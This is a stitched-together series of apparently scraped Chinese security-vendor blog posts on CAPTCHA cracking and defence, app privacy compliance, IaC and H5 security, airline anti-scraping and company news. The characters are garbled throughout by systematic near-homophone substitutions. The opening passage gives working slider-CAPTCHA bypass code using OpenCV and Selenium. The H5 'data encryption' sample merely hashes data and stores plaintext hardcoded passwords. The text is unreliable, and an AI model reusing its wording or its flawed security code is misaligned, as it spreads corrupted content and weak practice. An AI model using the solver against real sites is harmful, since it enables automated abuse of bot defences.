Image.open(BytesIO(requests.get(slider_img).content))应用图像处理库（例如 OpenCV）找到滑块在背景图片中的地位。import cv2# 把 PIL 图像转换为 OpenCV 图像bg_cv = cv2.cvtColor(np.array(bg_image), cv2.COLOR_RGB2BGR)slider_cv = cv2.cvtColor(np.array(slider_image), cv2.COLOR_RGB2BGR)# 应用模板匹配算法找到滑块在背景图片中的地位result = cv2.matchTemplate(bg_cv, slider_cv, cv2.TM_CCOEFF_NORMED)y, x = np.unravel_index(result.argmax(), result.shape)计算滑块须要挪动的间隔，并应用 Selenium 执行滑动操作。from selenium.webdriver.common.action_chains import ActionChainsslider_width = slider.size['width']distance = x + slider_width / 2actions = ActionChains(driver)actions.click_and_hold(slider).perform()actions.move_by_offset(distance, 0).perform()actions.release().perform()整体的代码的话，就是： ...

为帮忙开发者更高效地进行App隐衷合规检测，顶象推出利用隐衷合规检测服务，疾速发现App可能存在的各类隐衷安全漏洞，并提供具体的检测报告，给出业余的合规整改倡议。该服务可利用于上架前和合规检测，通过个人信息爱护剖析、威逼定位剖析和可视化后果报告等形式，帮忙开发者全方位评估App针对个人信息爱护的现状，辨认潜在的隐衷危险，构建平安可信的高质量App。 App合规性十分重要近日，工业和信息化部日前通报了2023年第2批侵害用户权利行为的App（SDK）名单，被通报App共55款，波及强制、频繁、适度索取权限等问题，还有一些消费者难以发觉的如App频繁自启动和关联启动、超范围索权，利用散发平台上App信息明示不到位等问题。从版本上看，安卓利用是重灾区，各大手机利用商店以及各种手机软件助手都有波及。 《App守法违规收集应用个人信息行为认定办法》是由中国互联网信息办公室于2019年11月公布的，旨在标准挪动应用程序对用户个人信息的收集、应用、解决等行为。本《规定》共六个要点，别离具体介绍了可被认定为“未公开收集应用规定”的行为，可被认定为“未明示收集应用个人信息的目标、形式和范畴”的行为，可被认定为“未经用户批准收集应用个人信息”的行为，可被认定为“违反必要准则，收集与其提供的服务无关的个人信息”的行为，可被认定为“未经批准向别人提供个人信息”的行为，以及可被认定为“未按法律规定提供删除或更正个人信息性能”或“未颁布投诉、举报形式等信息”的行为。 《常见类型挪动互联网应用程序必要个人信息范畴规定》是由工业和信息化部制订的，旨在标准挪动应用程序收集、应用用户个人信息时的范畴。对常见App收集个人信息的必要限度作出了列举性规定，划清了红线。明确App运营者不得因用户不批准收集非必要个人信息，而回绝用户应用App基本功能服务，不同App的必要个人信息范畴，与它们的基本功能服务密切相关。 隐衷合规检测助力App合规为了帮忙开发者更高效地进行App隐衷合规检测，聚焦更多的精力构建功能齐全、用户体验良好的高质量App，顶象推出利用隐衷合规检测服务。 该服务基于顶象外部积攒多年的App隐衷合规检测能力，帮忙开发者发现App可能存在的各类隐衷安全漏洞，提供具体的检测报告，并给出业余的合规整改倡议。同时，顶象业余的隐衷平安专家团队，还为开发者提供一对一专家咨询服务，帮忙开发者高效检测，疾速辨认App潜在的隐衷危险，构建平安可信的高质量App。 顶象利用隐衷合规检测服务能够利用于上架前和合规检测。 上架前隐衷检测。在各个挪动利用市场在利用上架前，对App进行隐衷检测，确保安全合规、发现存在的危险。 利用合规检测。基于多个监管文件，进行App日常合规检测、整改、二次检测和抽检等，避免对客户信息适度收集。 顶象利用隐衷合规检测服务提供个人信息爱护现状，威逼定位剖析和可视化后果报告。 个人信息爱护剖析。从隐衷政策文本、App收集应用个人信息行为、企业对用户权力的保障等三个方面，疾速评估App针对个人信息爱护的现状。 威逼剖析定位。根据监管、行业、企业，对App收集的数据信息进行剖析，通过AI沙箱检测+专家审查的形式，联合行业积淀教训，建模定位，全方位保障剖析后果的准确性。 可视化报告。通过全方位的隐衷合规评估后，提供业务场景、检测我的项目、检测伎俩、检测后果以及问题展现。 问题整改跟进。对于检测的问题提供专家领导意见，提供解决方案。 合规检测对开发者的帮忙顶象利用隐衷合规检测服务利用隐衷合规检测服务对于应用程序开发者来说十分重要，能够帮忙他们爱护用户集体信息安全和隐衷，保障应用程序的合规性和可靠性，进步应用程序的市场竞争力，并节俭开发成本和工夫。 1、保障应用程序的合规性和可靠性。监管部门对于应用程序合规经营的监管力度也在逐渐增强，开发者须要恪守相干法规和规定，保障应用程序的合规性和用户体验，发明更加平安、牢靠、有价值的应用程序服务。利用隐衷合规检测服务能够帮忙开发者全方位评估应用程序针对个人信息爱护的现状，发现问题并及时整改，确保应用程序的合规性和可靠性。 2、进步应用程序的市场竞争力。现在，隐衷平安成为越来越多用户抉择应用程序的一个重要因素。爱护用户集体信息安全和隐衷能够加强用户对应用程序的信赖，进步用户留存率和用户体验，从而进步应用程序的市场竞争力。利用隐衷合规检测服务能够帮忙开发者构建隐衷平安的应用程序，进步应用程序的市场竞争力。 3、节俭开发成本和工夫。利用隐衷合规检测服务为开发者提供了具体的检测报告和业余的合规整改倡议，帮忙开发者疾速辨认应用程序存在的问题，并提供解决方案。这能够帮忙开发者节俭开发成本和工夫，进步开发效率。 业务平安大讲堂：立刻报名 业务平安产品：收费试用 业务平安交换群：退出畅聊

“起初，没人留神这场劫难，不过是一个谬误的配置，一个默认的口令、一个没有修复的破绽、一次 DDoS 导致的宕机，直至整个攻打与所有人非亲非故。” ——《漂泊地球（云原生平安版）》「打响“IaC 平安保卫战”」，明天和大家分享的是 IaC 基础设施即代码的相干平安和一些对应的解决思路。 听到一些红队的小伙伴埋怨:" 政府/医疗/学校我的项目好做，然而到了互联网厂商和云环境下，就显得有些措手不及。"其实 IaC 在很多企业内曾经利用非常宽泛。然而相对来说「麻利开发」和「DevOps」曾经将开发技术栈、将传统的技术架构拉开了比拟大的鸿沟。更多的平安钻研人员仍专一于传统的「利用平安」和「根底平安」。 利用平安指咱们常说的「web 平安」，而根底平安个别指「主机平安」、「网络安全」等。 什么是 IaC？ 上图显示的是从文字定义上解释“什么是 IaC？” 然而定义往往都是比拟难懂的，对于平安人员，可能理论参加开发的场景比拟少，所以对具体开发我的项目所做的一些流程并不是很相熟。 从我集体的了解登程，IaC 其实就是一种思维：它将状态性的形容定义为了人类可浏览的代码段，并通过束缚工具，来实现从 0状态到 咱们冀望的状态的转变。举个例子：当你拿到一台簇新的电脑，或者是重装一台主机时，一些罕用的利用，环境都须要重新安装。生产业务也雷同，当一个新利用须要部署时，新的虚拟机须要为利用提供特定的环境依赖并初始化。这时，老运维通常会掏出祖传的 ansible 脚本，即可疾速生成一个残缺的、牢靠的环境，这便是晚期的 IaC 状态。 同样的，利用在进行配置管理、主动扩容缩容等等场景，都波及到了 IaC 的应用。IaC 的特色与分类「IaC 的特色」重复性：一份脚本能够屡次应用。可测试性，可视化：将本来不可见的状态形容进去，档次清晰明了，每一步骤能够独自测试。可扩大：比方咱们当初须要一个 nginx 主机，前面又须要了一个 nginx 主机，则能够利用 IaC 进行疾速扩容治理。一致性：IaC 保障最终的状态保持一致。 「IaC 的分类：」 命令式更直观的管制: 命令式 IaC 更适宜对基础设施进行间接的管制和操作，能够更好地管制底层组件的细节。更精准管制：命令式 IaC 容许更细粒度的管制，能够在配置文件中间接指定每个组件的细节，从而更准确地管制基础设施。更容易实现：因为命令式 IaC 应用的是编程语言，因而更容易上手和实现，不须要过多的培训和学习老本。更好的灵活性：命令式 IaC 更适宜具备肯定灵活性需要的组织，能够依据不同的需要对基础设施进行疾速调整。 申明式更简略和易读：申明式 IaC 应用的是基于申明的语言，代码更容易了解和保护。更自动化：申明式 IaC 能够实现更高水平的自动化，零碎可能主动解决基础设施的创立和保护，从而缩小了手动谬误。更稳固和牢靠：因为申明式 IaC 代码形容了冀望的最终状态，零碎将主动确保所需状态曾经实现，从而进步了零碎的稳定性和可靠性。更适宜大规模部署：申明式 IaC 更适宜具备大规模部署的组织，能够缩小配置和部署过程中的谬误和不一致性。IaC 的重要性咱们来看看 IaC 产生的两个理论劣势：其中最显著的就是「效率进步」： 另一个是「防止手动操作导致的平安危险」： 每次见到一些开发人员为了配置环境或寻找 bug，间接登录到了生产环境的机器进行间接操作，都胆战心惊。而 IaC 能够提供一套规范流程标准，防止人为操作失误。IaC 平安的挑战上面列出了 IaC 可能存在的危险： ...

H5 目前的技术曾经趋于成熟。它开发周期短开发周期短，投入和保护成本低，兼容性好。依据需要，H5能够制作文字、图形、音频、视频，因而能够用于PC网站、手机网站、微站、Web App、轻利用。而且因为最近AIGC的大火，它的制作老本变得更低。 H5的利用场景次要包含展现、营销、考察、游戏等等。 不过作为重要的挪动互联网服务载体，H5在给用户带来便当体验的同时，也让企业面临信息泄露、歹意劫持、薅羊毛等各类业务危险。 明天咱们就来看看怎么去防护H5。 常见业务危险链接伪造危险。攻击者通过伪造的H5网页链接，入侵毁坏业务零碎乃至内网，窃取重要信息、账户明码等。 页面篡改危险。H5网页代码遭篡改复制，做成钓鱼页面，盗取用户账户明码和信息等。 信息泄露危险。H5网页被植入恶意代码，盗取访问者的账号密码、隐衷信息等。 账号破解危险。H5往往是App或小程序应用服务的延长，与平台账户体系关联，很容易成为攻击者盗取账号、破解明码的重要指标。 “薅羊毛”危险。通过H5网页举办的各类优惠活动企业次要的拓客伎俩，“薅羊毛”不仅毁坏了失常的营销规定，白白耗费大量流动资金，更无奈保障新注册用户的精准性，导致营销流动成果功亏一篑。 业务防护思路咱们次要从业务平安的角度来进行防护，具体包含以下几个点（代码只是简略提供思路，仅供参考）： 数据安全防护：因为H5业务中会波及到用户数据的收集和存储，因而必须采取紧密的数据安全防护措施，例如数据加密、数据备份、访问控制等。 数据加密示例代码import hashlibimport base64# 数据加密函数def encrypt(data): # 对数据进行SHA256哈希解决 sha256 = hashlib.sha256() sha256.update(data.encode('utf-8')) hashed_data = sha256.digest() # 对哈希后的数据进行Base64编码解决 encoded_data = base64.b64encode(hashed_data) # 返回加密后的数据 return encoded_data.decode('utf-8')数据备份示例代码import shutil# 数据备份函数def backup_data(src_path, dst_path): # 应用shutil库的copytree函数进行数据备份 shutil.copytree(src_path, dst_path) print('数据备份胜利')访问控制示例代码# 用户列表users = [{'username': 'admin', 'password': '123456'}, {'username': 'user1', 'password': 'password1'}]# 登录函数def login(username, password): # 遍历用户列表进行登录验证 for user in users: if user['username'] == username and user['password'] == password: print('登录胜利') return True # 登录失败 print('登录失败') return False# 访问控制装璜器def require_login(func): def wrapper(*args, **kwargs): # 判断用户是否登录 if 'username' in kwargs and 'password' in kwargs: username = kwargs['username'] password = kwargs['password'] if login(username, password): # 登录胜利，执行原函数 return func(*args, **kwargs) # 用户未登录，返回错误信息 return '请登录后再进行操作' return wrapper# 须要进行登录验证的函数@require_logindef secret_info(): return '这是一些机密信息'# 应用示例if __name__ == '__main__': # 备份数据 backup_data('/path/to/data', '/path/to/backup') # 拜访受限的函数 print(secret_info(username='admin', password='123456')) # 拜访受限的函数（未登录） print(secret_info())网络安全防护：H5业务通常波及到数据传输和网络交互，因而必须采取有效的网络安全防护措施，例如SSL/TLS加密、防火墙、反向代理等。简略给一个SSL/TLS的代码： ...

网上输出关键词“破解验证码”，会呈现1740万个搜寻后果。“验证码辨认、轻松破解、暴力破解、逻辑破绽破解、简略破解”等等各类关键词的内容，不一而足，对于“如何用破解某某验证码”的帖子更是多如牛毛。 2017年，绍兴警方胜利破获了全国首例利用AI（人工智能）立功、进犯公民个人信息案。立功嫌疑人杨某通过使用人工智能机器深度学习技术，能够让程序软件如ALPHAGO一样自主操作辨认，无效辨认图片验证码，又快又准，很短时间就能辨认出上千上万个验证码，而且可能辨认出98%以上的验证码，轻松绕过互联网公司设置的验证码安全策略。 验证码作为人机交互界面经常出现的要害因素，是身份核验、防备危险、数据反爬的重要组成部分，广泛应用网站、App上，在注册、登录、交易、交互等各类场景中施展着巨大作用，具备真人辨认、身份核验的性能，在保障账户平安方面也具备重要作用，由此也成为黑灰产攻克破解的重要指标。为了破解验证码，黑灰产利用各种技术和伎俩疾速批量疾速破解，以满足批量注册、批量登录、歹意盗取等不法操作的须要。 黑灰产破解验证码的常见形式黑灰产破解验证码的伎俩多样化，但次要是机器破解和人工打码两种。 机器破解次要是通过辨认图片中的相干验证因素来进行破解，例如辨认滑动验证码的缺口，点选验证码中的文字因素和数字因素，其次要技术手段是图像处理，图像二值化，模仿滑动轨迹等相干技术。 第一步，首先制作网络爬虫工具，到各个验证码平台爬取验证码的图片素材。 第二步，生成验证码图片素材的模型库：例如旋转类验证码，生成图片旋转模型库；滑动类验证码，生成图片滑动模型库；拼图类验证码，生成图片拼接模型库等等，以此类推。 第三步，遇到须要破解的验证码，程序迅速辨认是哪类验证码：滑动？拼接？点选？旋转？计算等等。 第四步，应用类似度算法，检索此前验证码模型库，并疾速定位到相近的图片； 第五步，模仿人类操作，旋转/滑动/抉择/计算/拼接图片至指标角度； 第六步，骗过验证码的核验，取得通过凭证。机器破解的后期爬取图片、建模的的工作量很大，技术门槛高。因而，黑灰产另一种门槛较低的破解形式“人工打码”就应运而生。 第一步，建设或寻找一个工作平台； 第二步，工作发布者（个别是黑灰产），将获取到的验证码信息封装成工作提交到打码平台； 第三步，打码平台作为两头的任务调度者，将公布的任务调度给支付工作的平台用户（专门做验证码验证标注的人）； 第四步，工作支付者，实现验证码的标注，而后将标注后果返回给工作平台； 第五步，工作发布者（黑灰产）模仿人类用户，拿着标注的验证码进行验证； 第六步，骗过验证码的核验，取得通过凭证。 人工打码有一个很显著的毛病是单次申请耗时高，因为其破解的速度效率重大依赖于标注者的破解速度。 人机辨认的攻与防综合来看，黑灰产破解验证码次要是基于验证资源的穷举以及辨认，具备自动化攻打、伎俩多、破解速度快、破解验证码模式多等特点。 第一、自动化攻打。黑灰产应用自动化程序进行验证码破解，这种程序能够模仿人类操作，一直尝试多种可能性，并通过机器学习等技术对验证码进行剖析和辨认。 第二、攻打伎俩多。黑灰产应用多种攻击方式，如字典攻打、暴力破解、文本辨认、人工智能攻打等，以进步攻打的成功率。 第三、破解速度快。黑灰产应用高速攻打技术，使其得以在短时间内尝试大量的可能性，以达到破解验证码的目标。 第四、破解模式广。黑灰产能够攻打各种类型的验证码，包含文字、数字、图片、语音等多种形式，甚至是简单的混合验证码。 验证码要做好防守，必须针对黑灰产破解的时效性和高效性特点开展。 1、放慢验证码图库更新。高频率的生产图片保障新的验证图片实时更新，从本源上杜绝打码平台拖库。这样就导致黑灰产的标注者，须要源源不断地对新验证图片进行验证，极大减少了黑灰产的辨认与破解老本。 2、晋升验证因素辨认难度。基于深度学习和神经网络，生成一些难以被预测和反复的图片、元素，并在验证过程中退出工夫戳或者随机数等动态变化的因素，减少破解的难度，无效抵挡机器破解。 3、基于验证环境信息进行进攻。在验证码的验证环节采集有辨识度的环境信息，配置规定和策略来，筛选出可能是黑灰产的申请进行二次验证或拦挡。例如，判断实现验证时的验证环境信息和token上报时的验证环境信息是否统一，对屡次歹意攻打的IP地址进行拦挡，限度验证码输出的次数等。 AIGC加持，给验证码带来革命性变动AIGC，全名“AI generated content”，又称生成式AI，意为人工智能生成内容，具备文本续写，文字转图像、数字主持人等利用。其原理是利用人工智能技术中的自然语言解决、机器学习、深度学习等技术，对大量的语言数据进行剖析、学习和模仿，从而实现对自然语言的了解和生成。AIGC起源于20世纪90年代，直到2022年OpenAI推出ChatGPT3.5后，才被广为所知。 AIGC技术给验证码的研发和利用带来了很多新的价值，不仅晋升用户体验，带来新的验证形式，更加强验证码的安全性，当然也给验证平安带来新的平安挑战。1、有限生产验证图片。通过AIGC可能文本形容疾速生成对应图像，缩小工夫老本和工作量。无限量的图像素材，使得基于遍历图库的破解形式生效，大大加强验证码的破解难度。而且AIGC可能依据企业业务场景，生成个性化定制验证码图片。在拼图、旋转、滑动等验证形式下，如果黑灰产不晓得验证图片，就无奈实现破解。2、发明新型验证形式。利用AIGC，能够优化已有的验证形式，甚至发明出一些对用户敌对、但机器辨认难度较高的新型验证码。比方，常见的滑块验证码，因为为了保障有足够辨认度，指标缺口的像素与四周的像素须要有一些差别，因此往往非常容易辨认，进而轻易判断出滑块的指标地位，因此安全性并不高。利用AIGC，能够设计出没有缺口的滑块验证码，要判断出指标地位须要了解图像的语义，由此减少黑灰产的破解难度。 再比方，谷歌的reCAPTCHA，实际上能够视为一个指标检测的问题，对于机器视觉来说并不艰难。但若改为给定一句文字描述，“找出九宫格中合乎该形容的图片”，就能够将指标检测降级为语义匹配，对于机器而言，难度晋升了多个数量级。 3、减少黑灰产破解老本。基于AIGC技术生产图片或文字绝对容易，但要匹配文字和图片是绝对艰难的。AIGC规模化的生成海量图片有肯定随机性且不可逆，黑灰产要破解验证码，就须要了解图像的语义，这就须要应用到大语言模型和超大算力，老本十分高，而且大语言模型并不能开箱即用，须要二次配置定义，大部分的黑灰产并不具备利用大模型做破解模型的能力。 4、良好改善用户体验。基于AIGC生成的图像具备高度的精准度，进一步晋升验证码的用户体验。例如，空间语义验证形式中，基于AIGC生成的图片3D成果更为真切，更便于用户辨认空间信息。同时，也会让验证码提供商摒弃艺术字、数字字母变体等影响用户体验的验证形式，在不影响用户体验的同时，减少机器辨认的难度。 5、推动企业晋升验证码的平安对抗性。此外，黑产也能够利用AIGC加强破解能力。基于AIGC，黑灰产不再须要采集验证码厂商的图库并打标，就能训练模型辨认各种艺术字。具体来说，黑灰产能够利用AIGC主动生成大量汉字对应的各种款式的艺术字，作为数据集训练模型，使该模型可能十分鲁棒地辨认任何格调的艺术字。兴许在不久的未来，艺术字验证码这种验证形式将齐全生效。由此，进一步推动验证码企业晋升验证形式的安全性和对抗性。 为防备黑灰产，顶象构建了专属AIGC平台顶象构建了一个基于Stable Diffusion模型专属AGIC平台，由百余个GPU的小型计算集群组成。该模型基于Latent Diffusion Models（潜在扩散模型，LDMs）的文图生成（text-to-image），依据文本形容，主动疾速海量地生成相应图片。 具体来说，Stable Diffusion模型应用LDMs来从文本形容中提取相应的语义信息，而后将其投入到扩散过程中，由此产生随机的潜在向量，这些向量接着通过逆变换网络（inverse transformation network）转换为图像。扩散过程基于间断工夫的马尔可夫链（Markov chain），采纳随机散步的形式进行迭代，并且每一次迭代都会减少肯定的噪声。噪声的引入可能使得生成的图像具备更多的随机性和多样性，减少模型的创造力。同时，该模型还应用了自适应步长的办法，以在较短的工夫内疾速生成高分辨率的图像。 Stable Diffusion良好解决工夫老本和经济老本问题。如果要生成一张1024*1024尺寸的图像，Latent Diffusion通过在一个潜在示意空间（Latent Space）中迭代“去噪”，而后将示意后果解码为残缺的图像，让文图生成可能在生产级GPU上以10秒级别的工夫生成图片，大大降低了业务落地门槛。 AGIC+无感验证，让平安与体验兼得顶象无感验证集成的就是Stable Diffusion文本到图像生成开源模型。作为首个应用AIGC技术的业务平安产品，顶象无感验证在五个方面有显著晋升。 1、危险拦挡率晋升19%。应用动态图库作为验证码图片时，图库更新一周当前，爬虫的拦挡防御能力会呈现显著的成果衰减，一个月左右，歹意爬虫通过率会达到20%。应用AIGC生成图片后，爬虫通过验证通过率立刻降落至0.8%以下，且长时间维持在1%以内。相比之前动态图库的状况下，AIGC大幅提高了验证难度和防御能力。 2、管理员配置效率晋升50%。原先应用动态图片时，须要管理人员进行手动调整配置的图集、图标库等因素，当初AIGC主动生成的图集间接缩小多个配置环节，效率晋升50%。 ...

来投个票吧问题一：五一你会出去玩吗？A.不会 B.会 问题二：五一出行形式？A.自驾B.高铁C.飞机 问题三：高铁或飞机的话，你抢到票了吗？A.是B.否 关了三年的大学生们成为了城市穿梭“特种兵”，景区充斥着各种中老年团，更不用说我在西湖边掉的，然而在灵隐寺找到的鞋子了......往年五一，曾经是能够预感的火爆了。 然而，火爆的游览不仅让有旅游业方兴未艾，也让黄牛们赚到“盆满钵满”。高铁票且不说，机票的抢票难度曾经高到天际。这外面，就波及到非法代理人操控的歹意“爬虫”。 歹意爬虫如何影响咱们抢机票“爬虫”的定义咱们就不再赘述了。Python还是牛的。 而所谓歹意“爬虫”，就是局部航空服务代理人通过“爬虫”非法抓取航空公司B2C网站或官网App等平台上的机票信息，而后非法倒卖给别人以牟取利益。 局部代理人利用“爬虫”爬取下票务信息后，再利用虚伪的身份信息预订机票，但不付款。在航空公司容许的订票账期内，转售给真正须要购票的用户。这就导致局部机票并未售出，然而用户在航空公司查看时却显示已售罄。该行为称之为“虚伪占座”。 举个例子。 以下面机票为例，如果我能在官网原价买的话，应该是1390（经济舱），然而票贩子通过歹意爬虫，把票务信息扒拉进去，预订机票但不付款，这就会导致官网显示“票已售罄”，真正须要的人无奈购票，只能通过他们去买了，而这个时候，票价可能是3000多。票贩子就通过这样的形式赚“差价”。 歹意爬虫的危害自不必说，一是对航空公司而言，节约了航空公司带宽资源，白白耗费航空查问费用，也扰乱航空公司的失常经营；二是，而“虚伪占座”不仅给航空公司和用户带来经济损失，也侵害了用户的合法权益。更要害的是：由此带来订票量的稳定导致航空公司收益管理系统算法产生误判，给出不符合实际状况的运价调整，伤害了用户权利以及平台的口碑。这外面，受益者只有票贩子。 这种景象在五一节、国庆节这种大型节假日尤为突出。通过反欺诈核心监测发现，在国务院颁布五一劳动节假期安顿后的72小时里内，多家航空公司网站的“爬虫”流量暴增。其中，虚伪查票占总查问总量的36%以上，局部航空公司的虚伪查票数字甚至高达99%。 航空公司能够如何“反爬”“反爬”之前，咱们须要先辨认这种爬虫的特色： 歹意爬虫的特色1、拜访的指标网页比拟集中：“爬虫”代理人指标明确，次要是爬取班次、价格、数量等外围信息，因而只浏览拜访几个固定页面，不拜访其余页面。 2、查问订票等行为很有法则：因为“爬虫”是程序化操作，依照事后设定的流程进行拜访等，因而呈现出毫无思维、但很有法则、有节奏且继续的行为。 3、同一设施上有规模化的拜访和操作：“爬虫”的目标是最短时间内抓取最多信息，因而同一设施会有大量离散的行为，包含拜访、浏览、查问等。 4、拜访起源IP地址异样：失常状况下用户在查问、购买时，用户的IP地址比较稳定，而且拜访起源IP比拟；“爬虫”、“虚伪占座”等操作时，IP起源地址出现不同维度上的汇集，而且浏览、查问、购票等操作时不停变动IP地址。 5、设置UA模仿浏览器和频繁应用代理IP：很多“爬虫”程序伪装成浏览器进行拜访，比方在程序头或者UA中默认含有相似python-requests/2.18.4等固定字符串；并且通过购买或者租用的云服务、革新路由器、租用IP代理、频繁变更代理IP等进行拜访。 6、操作多集中非业务时间段：“爬虫”程序运行工夫多集中在无人值守阶段。此时系统监控会放松，而且平台的带宽等资源占用少，爬虫密集的批量爬取不会对带宽、接口造成影响。以下是顶象反欺诈核心监测到，凌晨1-5点是歹意“爬虫”的运行顶峰时段。 航空公司的常见伎俩歹意爬虫对于航空公司来说，其实很早就发现了，但也始终没什么好办法去检测和防备。一般来说，就是通过IP和验证码进行限度，然而这两类伎俩有十分大的局限性。 通过IP地址进行限度：当同一IP、同一电脑在肯定工夫内拜访网站的次数，零碎主动限度其拜访浏览等。然而，封禁IP的伎俩可能误伤实在用户，而且“爬虫”幕后的运营者随时可用购买或者租用的云服务、革新路由器、租用IP代理、频繁变更代理IP等办法绕过封禁的规定。 通过验证码进行限度：当某一用户拜访次数过多后，就主动让申请跳转到一个验证码页面，只有在输出正确的验证码之后能力持续拜访网站。然而设置简单的验证码会影响用户操作，给客户体验带来负面作用。 全链路防控可能更无效传统的伎俩或措施无奈对歹意“爬虫”进行分别，这就须要一套从客户端到业务端的全链路防控体系。顶象反爬解决方案基于设施指纹对实现对各类危险和模拟器、真机的辨认，以及Dinsight危险决策引擎毫秒级实时决策对行为剖析（鼠标的滑动轨迹、键盘的敲击速率、滑动验证码的滑动轨迹、速率、按钮点击等行为轨迹等），实现对歹意“爬虫”行为的无效辨认；通过智能无感验证的人机交互防护，间接拦挡“爬虫”对敏感数据的爬取；利用Xintell智能模型平台建设基于业务场景的策略模型，从而对反爬成果进行实时优化，良好防备歹意爬取的危险。 顶象数据反爬解决方案根据多年攻防反抗实战经验，提供了动静策略的精准防护；全链路纵深防护，防止“爬虫”的单点绕过；多维度进攻，无效拦挡各种歹意“爬虫”行为；无感的人机交互验证，无效反爬又不影响失常用户体验。 

某游览公司，在短视频平台上公布了本人的小程序服务。用户观看精彩游览直播或视频时，能够转到视频平台的小程序上查阅具体路线套餐。该游览公司想具体理解来访者的更多状况，以便于进行深度营销，为用户提供个性化服务。通过多番比拟，他们选用了顶象uni-app版设施指纹。 顶象uni-app版设施指纹，通过用户上网设施的硬件、网络、环境等特色信息生成设施的惟一标识，可无效辨认模拟器、刷机改机、Root、越狱、劫持注入等危险，可能及时发现歹意设施和用户，实现更加精准的危险管制和反欺诈防备。并能够对客户的设施信息进行全面收集和剖析，助力企业个性化服务。 顶象uni-app版设施指纹反对H5、微信小程序、支付宝小程序、百度智能小程序、头条小程序、QQ小程序、360小程序、App、快利用等，具备疾速反抗、高效危险辨认、99%以上稳定性和100%的唯一性的特点。企业能够依据本人的需要，抉择须要的平台版本。 目前，顶象uni-app版设施指纹和uni-app版无感验证已上线，在DCloud插件市场（ext.dcloud.net.cn），搜寻“顶象”即可间接下载。 顶象uni-app版无感验证集成13种验证形式，多种防控策略，会集了4380条危险策略、112类危险情报、笼罩24个行业、118种危险类型，防控精准度>99.9%，1天内便可实现从危险到情报的转化，行业危险感知能力实力增强，同时反对平安用户无感通过，实时反抗处理能力更是缩减至60s内。帮忙企业在登录、注册、领取等场景中实现疾速验证身份，大大提高了服务体验的便捷性和效率。 uni-app是一款基于Vue.js框架的跨平台利用开发框架，采纳“基于条件编译的代码生成技术”，可能依据应用程序平台的不同，编译出特定的利用程序代码，因而同一份代码编译生成多个应用程序，包含iOS、Android、H5、小程序等。uni-app不仅大大降低了应用程序的开发难度和复杂度，更反对多种UI组件库，包含Vant、Mint UI、uView等，帮忙企业需要抉择适宜的组件库，疾速构建专属应用程序。 随着uni-app版设施指纹和uni-app版无感验证陆续上线，顶象为企业提供更多渠道平台反对，满足客户多场景多渠道多平台服务的需要，晋升了业务的竞争力，进一步晋升用户满意度。 业务平安大讲堂：立刻报名 业务平安产品：收费试用 业务平安交换群：退出畅聊

近日，顶象正式退出深圳市网络与信息安全行业协会，将携手协会发展网络安全政策宣传、行业探讨、学术交流，开展技术优势互补和深度交融，为企业数字化转型降级保驾护航，助力大湾区数字平安建设。 深圳市网络与信息安全行业协会，是经深圳市经贸信息委信息安全处倡导，由业内企业自主发动，获深圳市民政局批准成立的非盈利性社会个人。作为深圳市网络与信息安全行业的权威行业组织，深圳市网络与信息安全行业协会是中国网络安全审查技术与认证核心（CCRC）在深圳惟一受权的工作站，是经深圳市人力资源和社会保障局核准，发展网络空间平安工程技术业余职称评审工作的社会组织。 顶象是国内当先的业务平安公司，旨在帮忙企业构建自主可控的业务平安体系，解决伪造、篡改、劫持、冒用、虚伪制作等业务欺诈威逼，防备化解各类网络黑灰产危险，让业务更加衰弱稳固，助力企业翻新与增长。 深圳市网络与信息安全行业协会秘书长白健示意，欢送顶象退出协会，让咱们携手一起推动深圳市网络与信息安全保障体系建设，促成网络与信息安全行业衰弱、可继续倒退，晋升深圳网络与信息安全行业的国际化程度。 顶象华南区销售总监张金曼示意，此次退出深圳市网络与信息安全协会，将有助于顶象进一步服务深圳及大湾区市场。顶象华南团队将进一步与协会及岗位同行通力合作，给用户带来业余的业务平安产品和服务。 粤港澳大湾区是我国数字经济倒退水平最高的区域之一，在国家数字经济策略中具备重要的位置，建设具备国内竞争力的产业集群、打造寰球数字经济倒退新高地曾经成为大湾区倒退新方向。 广东在全面深入数字政府建设的过程中，通过“三横四纵”的网络安全体系来保障数字政府网络安全。具体包含构建“平安治理、平安技术、平安经营、安全监管”四大平安体系，贯通数字政府云平台、大数据中心、政务利用建设经营全程。深圳正在充沛整合资源，鼎力推动数字平安人才培养、技术创新、产业倒退的统筹规划和整体布局，放慢推动数字平安翻新技术服务基地建设，摸索翻新网络安全教育技术产业交融倒退模式，构建大湾区数字平安屏障。 业务平安大讲堂：立刻报名 业务平安产品：收费试用 业务平安交换群：退出畅聊

平安无忧的软件开发最佳实际切实是很有必要，因为平安危险无处不在。在网络攻击流行的时代，它们可能影响到每个人，包含集体、公司和政府。因而，确保软件开发的安全性至关重要。 本篇文章将解释了什么是平安的软件，如何确保安全性，以及为您提供平安软件开发的最佳实际。 不平安的软件开发会产生什么？网络攻击占据了新闻的头条地位。恶意软件Duqu和Stuxnet在2010年和2011年引起了宽泛关注。从那个时候开始，网络攻击变得越来越重大。WannaCry在2017年攻打了包含英国国家医疗服务体系在内的重要零碎。GitHub在2018年初蒙受了一次拒绝服务攻打。而2021年的Log4j破绽至今仍在被利用（咱们在2021年也公布了Log4j 破绽解读文章，点此浏览）…… 嵌入式零碎也无奈幸免于难 嵌入式零碎越来越容易受到危险的威逼。这曾经导致了医疗设施和汽车行业的召回事件。而且，汽车行业尤其容易受到网络威逼。 这是一个超大的问题。 针对嵌入式零碎的网络攻击可能会造成对以下方面的大规模侵害： 要害基础设施，包含发电、石油和天然气精炼；电信；交通运输；水务和废物控制系统。平安软件开发的五大要害危险因素相互依赖的零碎使软件成为最单薄的环节；软件规模和复杂性使测试变得复杂；外包软件供应链减少了危险裸露；简单的攻打可能找到更多危险；重复使用旧版软件。当今应用程序平安（AppSec）畛域的常见问题现在，各种类型的软件应用程序被开发用于嵌入式零碎、挪动设施、电动汽车、银行和交易服务。然而，人们经常疏忽的是，许多应用程序和数字体验的设计和运行都没有安全措施，如果平安不是首要思考的话，可能会带来危险。 即便优先思考安全性并施行了平安的软件开发实际，公司依然可能被攻打搞得措手不及。当今应用程序平安环境中的常见问题包含： 